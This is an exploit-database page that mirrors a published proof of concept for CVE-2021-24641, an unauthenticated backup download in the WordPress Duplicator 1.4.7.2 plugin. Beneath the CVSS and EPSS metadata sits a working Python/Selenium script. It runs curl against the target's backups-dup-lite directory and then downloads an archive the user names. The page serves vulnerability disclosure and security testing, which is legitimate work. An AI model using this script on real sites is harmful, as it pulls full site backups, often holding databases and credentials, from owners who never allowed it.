Advertisement






WordPress Duplicator 1.4.7.2 Backup Disclosure

CVE Category Price Severity
CVE-2021-24641 CWE-200 Not specified High
Author Risk Exploitation Type Date
Unk9vvN High Remote 2022-08-23
CPE
cpe:cpe:/a:wordpress:duplicator:1.4.7.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080067

Below is a copy:

WordPress Duplicator 1.4.7.2 Backup Disclosure
## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.23.2022
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/duplicator/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2

## Description:
The WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated
Backup Download, after an update from the 1.4.7.1 version.
The attacker can download all archive information from the system by
using this vulnerability!
Status: CRITICAL

[+] Exploit:

```python
#!/usr/bin/python
# Author nu11secur1ty
from selenium import webdriver
import time
import os

print("Test if you can access the directory\n")
time.sleep(5)
os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')
target=input("Give the name of the archive...\n")
driver = webdriver.Chrome()
driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'
+ target)

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)

## Proof and Exploit:
[href](https://streamable.com/x0cvjh)


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum